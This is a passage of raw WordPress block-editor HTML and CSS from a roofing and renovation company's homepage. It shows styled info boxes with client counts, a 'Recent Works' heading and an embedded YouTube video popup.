.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\"} -->\n<style type=\"text/css\"> .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"42aff9bf-25ea-43ea-b807-8a8c00c85148\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-42aff9bf-25ea-43ea-b807-8a8c00c85148 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"67a82438-88af-4556-ac9e-4c3da247e0cf\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-67a82438-88af-4556-ac9e-4c3da247e0cf\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"72cbdd00-2b42-4deb-a7fd-0c19210e65bf\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ce6cb053-1ec8-4c04-85db-13a427505324\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-ce6cb053-1ec8-4c04-85db-13a427505324 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"9f4663ea-a5db-40fc-b1cc-f21b84eb8759\"} -->\n<style type=\"text/css\"> .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"91d4b807-310e-4d33-9c09-5410cb4f7c01\"} -->\n<style type=\"text/css\"> .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 